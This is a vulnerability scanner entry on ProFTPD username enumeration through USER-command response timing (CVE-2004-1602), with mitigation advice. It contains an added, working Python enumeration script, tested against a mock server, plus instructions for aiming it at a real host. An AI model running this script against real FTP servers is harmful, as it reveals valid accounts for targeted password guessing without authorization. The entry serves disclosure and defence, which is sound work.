| VID | 16084 |
| Severity | 20 |
| Port | 21 |
| Protocol | TCP |
| Class | FTP |
| Detailed Description |
According to its banner, the remote ProFTPD server may allow a remote attacker to enumerate valid user accounts. ProFTPD is an open-source FTP server for Unix-like operating systems. ProFTPD 1.2.8 and 1.2.10, and possibly other versions, take a measurably different amount of time to process a valid username than an invalid one. By timing the interval between sending the 'USER' command and receiving the server's response, a remote attacker can tell existing accounts from non-existent ones without ever supplying a password, and can then concentrate password guessing on the accounts that actually exist.
* Note: This check relies solely on the banner of the remote ProFTPD server to assess this vulnerability, so it may be a false positive. The reverse also holds: ProFTPD's ServerIdent directive lets an administrator change or suppress the version string, so an affected server can evade a banner-only check. Confirm by measuring the USER response time directly.
* References: http://www.osvdb.org/displayvuln.php?osvdb_id=10758 http://securitytracker.com/alerts/2004/Oct/1011687.html
* Platforms Affected: ProFTPD Project ProFTPD 1.2.8; ProFTPD Project ProFTPD 1.2.10; ProFTPD Project ProFTPD, possibly other versions; Linux, any version; Unix, any version |
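The timing measurement described above, as an added example that is not part of this database entry, the scanner, or ProFTPD's own code. It opens a fresh connection per sample, discards the banner, sends USER and times the first reply, then flags a candidate whose median timing differs from a baseline built with a bogus username. The mock FTP server, the probe name INVALID_PROBE, the candidate list and the flagging threshold are all constructed assumptions so the script runs offline; the mock imitates the behaviour the advisory describes (a delay for valid names) and not ProFTPD's real code path. Differences in either direction are flagged, because the entry does not say which case is slower.

```python
"""Timing check for FTP USER-command username enumeration (CVE-2004-1602 style).

Added example, not scanner or ProFTPD code. The mock server below is
constructed solely so the script runs offline.
"""
import socket
import socketserver
import statistics
import threading
import time

# Assumed probe name that no real server should know; used to build a baseline.
INVALID_PROBE = "zz-no-such-user-9f3a"


def _read_reply(rfile):
    """Read one FTP reply, including multi-line replies ('220-... / 220 ...')."""
    line = rfile.readline().decode("latin-1", "replace")
    if line[3:4] == "-":
        code = line[:3]
        while True:
            more = rfile.readline().decode("latin-1", "replace")
            if not more or (more.startswith(code) and more[3:4] == " "):
                break
    return line.strip()


def time_user_command(host, port, username, samples=5, timeout=5.0):
    """Seconds between sending 'USER <name>' and the first reply, one fresh
    connection per sample so connection setup is never part of the measurement."""
    elapsed = []
    for _ in range(samples):
        with socket.create_connection((host, port), timeout=timeout) as sock:
            rfile = sock.makefile("rb")
            _read_reply(rfile)  # 220 banner: read and ignored, we do not trust it
            sock.sendall(f"USER {username}\r\n".encode("ascii"))
            t0 = time.perf_counter()
            _read_reply(rfile)  # 331 / 530 / ...
            elapsed.append(time.perf_counter() - t0)
    return elapsed


def enumerate_users(host, port, candidates, samples=5, min_gap=0.02):
    """Flag each candidate whose median USER timing differs from the bogus-name
    baseline by more than min_gap seconds or 4x the baseline spread, whichever is
    larger. The threshold is a heuristic assumption, not from the advisory."""
    baseline = time_user_command(host, port, INVALID_PROBE, samples)
    base_med = statistics.median(baseline)
    gap = max(min_gap, 4 * statistics.pstdev(baseline))
    results = {}
    for name in candidates:
        med = statistics.median(time_user_command(host, port, name, samples))
        results[name] = abs(med - base_med) > gap
    return results


# --- constructed mock FTP server: valid names take ~100 ms longer to answer ---
MOCK_VALID_USERS = {"root", "ftp"}  # assumed account set for the mock only
MOCK_DELAY = 0.10


class _MockFtpHandler(socketserver.StreamRequestHandler):
    def handle(self):
        self.wfile.write(b"220 ProFTPD 1.2.10 Server (mock) [127.0.0.1]\r\n")
        line = self.rfile.readline().decode("ascii", "replace").strip()
        verb, _, arg = line.partition(" ")
        if verb.upper() != "USER":
            self.wfile.write(b"500 Unknown command\r\n")
            return
        if arg in MOCK_VALID_USERS:
            time.sleep(MOCK_DELAY)  # the leak: extra work only for real accounts
        # Same reply text either way; only the timing differs.
        self.wfile.write(f"331 Password required for {arg}\r\n".encode("ascii"))


def demo(candidates=("root", "ftp", "nosuchuser")):
    """Run the check against the in-process mock; returns {name: flagged}."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _MockFtpHandler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        port = server.server_address[1]
        return enumerate_users("127.0.0.1", port, candidates, samples=3)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for name, flagged in demo().items():
        print(f"{name:12s} {'VALID (timing leak)' if flagged else 'no difference'}")
```

Against a real server, point enumerate_users at the host and port instead of demo() and raise samples: on a network path the jitter is far larger than on loopback, so the baseline spread, not the fixed 20 ms floor, decides the threshold, and a single sample proves nothing.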
| Recommendation | No upgrade or patch was available as of October 2004. Upgrade to a version of ProFTPD that fixes this problem once it becomes available from the ProFTPD Web site at http://www.proftpd.org/ Until then, restrict which source addresses can reach port 21 and watch the FTP logs for bursts of USER commands with no PASS attempts, which is what this enumeration looks like from the server side. |
| Related URL | CVE-2004-1602 (CVE) |
| Related URL | 11430 (SecurityFocus) |
| Related URL | 17724 (ISS) |